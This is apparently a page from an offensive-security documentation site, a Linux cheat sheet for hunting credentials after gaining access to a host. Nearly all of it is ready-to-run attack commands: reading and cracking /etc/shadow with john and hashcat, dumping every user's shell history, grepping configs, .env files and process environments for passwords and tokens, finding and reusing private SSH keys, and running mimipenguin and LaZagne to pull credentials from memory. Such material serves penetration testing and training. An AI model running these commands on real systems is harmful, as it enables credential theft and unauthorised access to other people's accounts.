> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Credential Hunting

> Finding credentials on Linux: shadow file, history, config files, SSH keys, environment variables, and memory.

## /etc/shadow

### Check Readable

```bash theme={"dark"}
ls -la /etc/shadow
cat /etc/shadow 2>/dev/null
```

### Crack Hashes

```bash theme={"dark"}
# Copy shadow and passwd to attacker
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
```

```bash theme={"dark"}
hashcat -m 1800 shadow.hash /usr/share/wordlists/rockyou.txt
```

| Hash Prefix | Algorithm | Hashcat Mode                                                                             |
| ----------- | --------- | ---------------------------------------------------------------------------------------- |
| `$1$`       | MD5       | 500                                                                                      |
| `$5$`       | SHA-256   | 7400                                                                                     |
| `$6$`       | SHA-512   | 1800                                                                                     |
| `$y$`       | yescrypt  | no native mode (28400 is bcrypt-sha512) — crack with John, or hashcat 7.0+ scrypt plugin |

***

## History Files

```bash theme={"dark"}
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.psql_history
```

### All Users

```bash theme={"dark"}
find /home -name ".*history" -exec cat {} \; 2>/dev/null
cat /root/.bash_history 2>/dev/null
```

### Search for Passwords in History

```bash theme={"dark"}
grep -i "password\|pass\|pwd\|secret\|token" ~/.bash_history
```

***

## Config Files

### Web Applications

```bash theme={"dark"}
cat /var/www/html/wp-config.php
cat /var/www/html/.env
cat /var/www/html/config.php
cat /var/www/html/configuration.php
find /var/www -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name "*.env" 2>/dev/null
```

### Database Configs

```bash theme={"dark"}
cat /etc/mysql/my.cnf
cat /etc/postgresql/*/main/pg_hba.conf
cat /etc/mongod.conf
```

### Common Config Locations

```bash theme={"dark"}
find /etc -name "*.conf" -exec grep -li "password\|pass\|pwd" {} \; 2>/dev/null
find /opt -name "*.conf" -o -name "*.config" -o -name "*.yml" -o -name "*.yaml" 2>/dev/null
```

***

## SSH Keys

### Find Private Keys

```bash theme={"dark"}
find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "id_dsa" 2>/dev/null
ls -la /home/*/.ssh/
ls -la /root/.ssh/ 2>/dev/null
```

### Use Found Key

```bash theme={"dark"}
chmod 600 id_rsa
ssh -i id_rsa user@TARGET
```

### Authorized Keys (Persistence)

```bash theme={"dark"}
cat /home/*/.ssh/authorized_keys 2>/dev/null
```

***

## Environment Variables

```bash theme={"dark"}
env
printenv
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -i "pass\|key\|secret\|token"
```

### Systemd Service Env Files

```bash theme={"dark"}
find /etc/systemd -name "*.service" -exec grep -l "Environment" {} \;
```

***

## Wildcard Search for Passwords

```bash theme={"dark"}
grep -rli "password" /etc/ 2>/dev/null
grep -rli "password" /var/ 2>/dev/null
grep -rli "password" /opt/ 2>/dev/null
grep -rli "password" /home/ 2>/dev/null
```

### Files Containing "pass"

```bash theme={"dark"}
find / -type f \( -name "*.txt" -o -name "*.conf" -o -name "*.cfg" -o -name "*.xml" -o -name "*.ini" -o -name "*.env" -o -name "*.yml" \) -exec grep -li "pass" {} \; 2>/dev/null
```

***

## Credentials in Memory

### /proc

```bash theme={"dark"}
strings /proc/*/maps 2>/dev/null | grep -i "pass"
```

### mimipenguin

```bash theme={"dark"}
https://github.com/huntergregal/mimipenguin

sudo python3 mimipenguin.py
sudo bash mimipenguin.sh
```

### LaZagne

```bash theme={"dark"}
https://github.com/AlessandroZ/LaZagne

python3 laZagne.py all
```

***

## Backup Files

```bash theme={"dark"}
find / -name "*.bak" -o -name "*.old" -o -name "*.backup" -o -name "*~" 2>/dev/null | grep -v proc
```

***

## Databases

### SQLite

```bash theme={"dark"}
find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null
sqlite3 found.db ".tables"
sqlite3 found.db "SELECT * FROM users;"
```

### MySQL (If Accessible)

```bash theme={"dark"}
mysql -u root -p
mysql -u root
```
